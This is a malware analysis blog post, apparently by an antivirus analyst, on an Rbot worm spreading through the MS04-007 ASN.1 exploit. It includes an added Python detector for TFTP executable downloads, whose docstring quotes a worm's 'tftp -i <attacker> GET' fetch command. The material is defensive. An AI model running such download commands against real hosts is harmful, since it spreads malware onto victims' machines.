The time of the flash Internet worms that could spread to millions of machines in less than an hour has passed. Nowadays we are living in the days of trojans, phishing, password stealing and backdoors. However, combinations of fast-spreading worms and very cunning trojans are not rare at all.
On Thursday, 2nd of June, around 17:12 GMT, we received an interesting exploit on one of the machines that make up the 'Smallpot' honeypot network. Slowly, more packets started to arrive, and it became obvious that whatever was sending them was picking up momentum. Since the simplest explanation is usually the right one, the first guess was an Internet worm attack.
Investigation of the packets revealed a Microsoft ASN.1 exploit (the MS04-007 vulnerability), which tries to download and run an executable from the attacking machine via TFTP. We secured a binary and took a look under the hood. The responsible worm was an Rbot variant, 121504 bytes long, generically detected by KAV as 'Backdoor.Win32.Rbot.gen'. It is packed with the MEW runtime executable packer and has an MD5 of '7fe7a8320bbd029a87e0228ff5d23053'.
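The download stage described above is the part of a worm's propagation that is easiest to spot on a network sensor: right after the exploit fires, the victim sends a TFTP read request (UDP port 69) for a binary hosted on the attacking host. The following is an added example, not code from the original post or from Kaspersky, that parses TFTP datagrams per RFC 1350 and flags read requests for executables in binary mode. The sample datagrams, IP addresses and the file name `svchost32.exe` are constructed for the example; they are not captured worm traffic, and the ASN.1 exploit itself is not reproduced.

```python
"""Flag TFTP read requests for executables, the download stage of a
propagating worm. Added example; the datagrams below are constructed
by hand and are not captured traffic."""
import struct

TFTP_PORT = 69
OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR"}
EXEC_SUFFIXES = (".exe", ".com", ".scr", ".pif", ".bat", ".dll")


def parse_tftp(payload: bytes):
    """Parse one TFTP datagram.

    Returns (opcode_name, filename, mode) for RRQ/WRQ,
    (opcode_name, None, None) for other valid opcodes, or None when the
    payload is not well-formed TFTP (unknown opcode, missing NUL
    terminators, empty file name, non-ASCII fields, unknown mode)."""
    if len(payload) < 2:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    name = OPCODES.get(opcode)
    if name is None:
        return None
    if name not in ("RRQ", "WRQ"):
        return (name, None, None)
    # RFC 1350 request layout: opcode | filename | 0 | mode | 0
    # (RFC 2347 options may follow; they are ignored here)
    fields = payload[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0]:
        return None
    try:
        filename = fields[0].decode("ascii")
        mode = fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        return None
    if mode not in ("netascii", "octet", "mail"):
        return None
    return (name, filename, mode)


def flag_executable_fetches(datagrams):
    """datagrams: iterable of (src_ip, dst_ip, dst_port, payload).

    Returns [(client_ip, server_ip, filename)] for every RRQ that asks for
    an executable in binary (octet) mode. On the wire this is what the
    exploit shell's 'tftp -i <attacker> GET <file>.exe' step looks like:
    the victim is the TFTP client and the attacker is the server."""
    hits = []
    for src, dst, dport, payload in datagrams:
        if dport != TFTP_PORT:
            continue
        parsed = parse_tftp(payload)
        if parsed is None:
            continue
        op, filename, mode = parsed
        if op == "RRQ" and mode == "octet" and filename.lower().endswith(EXEC_SUFFIXES):
            hits.append((src, dst, filename))
    return hits


def rrq(filename: str, mode: str = "octet") -> bytes:
    """Build a TFTP read request; used only to construct sample traffic."""
    return struct.pack("!H", 1) + filename.encode() + b"\x00" + mode.encode() + b"\x00"


# Constructed sample datagrams (hypothetical addresses): an infected
# honeypot (10.0.0.5) fetching a binary from the attacking host
# (192.0.2.10), plus benign and malformed TFTP traffic.
SAMPLE = [
    ("10.0.0.5", "192.0.2.10", 69, rrq("svchost32.exe")),           # worm download
    ("10.0.0.7", "10.0.0.1", 69, rrq("boot/pxelinux.0")),            # PXE boot, benign
    ("10.0.0.8", "10.0.0.1", 69, rrq("readme.txt", "netascii")),     # text file, benign
    ("10.0.0.9", "10.0.0.1", 69, struct.pack("!H", 4) + b"\x00\x01"),  # ACK, not a request
    ("10.0.0.9", "10.0.0.1", 69, b"\x00"),                           # truncated datagram
]

if __name__ == "__main__":
    for client, server, name in flag_executable_fetches(SAMPLE):
        print(f"{client} fetched {name} from {server} over TFTP")
```

Fed the sample traffic, the detector reports only the first datagram. In a honeypot deployment the useful follow-up is to record the server address from each hit, since that is the host spreading the worm, and to fetch the named file from it for analysis.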
Besides the ASN.1 exploit (and this is the first worm to use it successfully on the Internet), the Rbot variant uses a multitude of other exploits: DCOM, RPC, Veritas Backup Exec, LSASS, MSSQL, password guessing and so on. It also steals registration keys for a long list of popular games and PayPal account logins, has an embedded backdoor and, of course, DDoS capabilities. Basically, it is a worm which tries very hard to spread while at the same time stealing as much valuable data from the victim machine as is available. It is a highly infectious worm, written for profit. And yes, most of the other worms we are seeing nowadays are no different.
Three years ago, the worst thing that could happen to your computer was a corrupted flash ROM or a wiped HDD. In most cases, you could even recover the data from the HDD. Nowadays, a virus infection is much worse: your computer may easily become a pawn of an organization of cybercriminals which blackmails companies over the Internet. Or your e-banking accounts are suddenly missing a few hundred euros. Or your valuable items from an online game are suddenly somebody else's. There are cases in which people have killed each other over such things.
With that in mind, I am left with a question: aren't we becoming too addicted to our beloved computers? Is it really worth dying for a thing which only exists as polarized atoms on a platter, among billions of others, 10,000 km away? Are we becoming too dependent on technology, so soon? I'm afraid the answer has more implications than we are ready to accept.